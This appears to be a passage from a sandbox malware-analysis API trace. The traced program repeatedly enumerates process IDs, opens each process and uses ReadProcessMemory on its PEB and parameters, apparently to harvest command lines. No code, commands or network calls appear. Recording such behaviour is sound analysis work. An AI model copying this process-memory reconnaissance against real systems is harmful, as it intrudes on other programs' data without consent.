[0405.511] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.538] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x240
[0405.538] GetLastError () returned 0x0
[0405.538] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.539] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.539] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x422920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.539] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4226f4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.540] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.542] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.542] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.542] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.542] malloc (_Size=0x70) returned 0x2c4740
[0405.542] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x42275c, lpBuffer=0x2c4740, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.543] free (_Block=0x2c4740)
[0405.544] CloseHandle (hObject=0x240) returned 1
[0405.545] _ui64tow (_Value=0xacc, _Buffer="2756", _Radix=10) returned="2764"
[0405.550] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2764") returned 4
[0405.552] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.552] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.575] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x240
[0405.575] GetLastError () returned 0x0
[0405.575] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.575] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.576] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.576] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb2920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.576] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb26e8, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.577] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.578] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.578] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.579] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.579] malloc (_Size=0x74) returned 0x2c4740
[0405.579] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb2754, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.579] free (_Block=0x2c4740)
[0405.580] CloseHandle (hObject=0x240) returned 1
[0405.581] _ui64tow (_Value=0xad4, _Buffer="2764", _Radix=10) returned="2772"
[0405.586] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2772") returned 4
[0405.587] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.587] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x240
[0405.613] GetLastError () returned 0x0
[0405.613] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x252910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2526e4, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.615] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.616] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.616] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.616] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.617] malloc (_Size=0x6e) returned 0x2c4740
[0405.617] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x25274a, lpBuffer=0x2c4740, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.617] free (_Block=0x2c4740)
[0405.618] CloseHandle (hObject=0x240) returned 1
[0405.619] _ui64tow (_Value=0xadc, _Buffer="2772", _Radix=10) returned="2780"
[0405.623] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2780") returned 4
[0405.624] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.625] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.681] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x240
[0405.681] GetLastError () returned 0x0
[0405.681] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.682] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.695] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.695] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3528e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.696] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3526e0, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.699] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.700] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.700] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.701] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.701] malloc (_Size=0x5e) returned 0x2c0790
[0405.701] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352736, lpBuffer=0x2c0790, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0405.701] free (_Block=0x2c0790)
[0405.702] CloseHandle (hObject=0x240) returned 1
[0405.741] _ui64tow (_Value=0xab0, _Buffer="2780", _Radix=10) returned="2736"
[0405.746] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2736") returned 4
[0405.747] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x232, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.747] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab0) returned 0x240
[0405.781] GetLastError () returned 0x0
[0405.781] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.781] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.782] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.782] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.782] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b26fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.783] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.785] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.785] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.785] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.785] malloc (_Size=0x74) returned 0x2c4740
[0405.785] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2766, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.786] free (_Block=0x2c4740)
[0405.786] CloseHandle (hObject=0x240) returned 1
[0405.787] _ui64tow (_Value=0xcb4, _Buffer="2736", _Radix=10) returned="3252"
[0405.792] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3252") returned 4
[0405.793] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.793] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.868] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcb4) returned 0x0
[0405.868] CloseHandle (hObject=0x0) returned 0
[0405.869] _ui64tow (_Value=0xe78, _Buffer="3252", _Radix=10) returned="3704"
[0405.874] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3704") returned 4
[0405.875] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.875] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.896] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe78) returned 0x0
[0405.896] CloseHandle (hObject=0x0) returned 0
[0405.897] _ui64tow (_Value=0xf00, _Buffer="3704", _Radix=10) returned="3840"
[0405.902] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3840") returned 4
[0405.903] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.903] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.933] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf00) returned 0x0
[0405.933] CloseHandle (hObject=0x0) returned 0
[0405.934] _ui64tow (_Value=0xb60, _Buffer="3840", _Radix=10) returned="2912"
[0405.938] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2912") returned 4
[0405.939] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.939] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.961] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x0
[0405.961] CloseHandle (hObject=0x0) returned 0
[0405.962] _ui64tow (_Value=0x384, _Buffer="2912", _Radix=10) returned="900"
[0405.966] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="900") returned 3
[0405.967] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.968] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.016] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x384) returned 0x240
[0406.017] GetLastError () returned 0x0
[0406.017] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.017] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.017] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.017] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c28b0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.018] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c2688, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.019] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.020] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.020] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.020] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.021] malloc (_Size=0x116) returned 0x2c4740
[0406.021] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c26c8, lpBuffer=0x2c4740, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0406.021] free (_Block=0x2c4740)
[0406.022] CloseHandle (hObject=0x240) returned 1
[0406.023] _ui64tow (_Value=0x424, _Buffer="900", _Radix=10) returned="1060"
[0406.030] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1060") returned 4
[0406.031] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.031] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.053] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x240
[0406.054] GetLastError () returned 0x0
[0406.054] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f2850, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f26c8, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.055] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.057] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.057] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.057] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.057] malloc (_Size=0x80) returned 0x2e3a70
[0406.057] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f270a, lpBuffer=0x2e3a70, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0406.058] free (_Block=0x2e3a70)
[0406.058] CloseHandle (hObject=0x240) returned 1
[0406.059] _ui64tow (_Value=0xd68, _Buffer="1060", _Radix=10) returned="3432"
[0406.064] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3432") returned 4
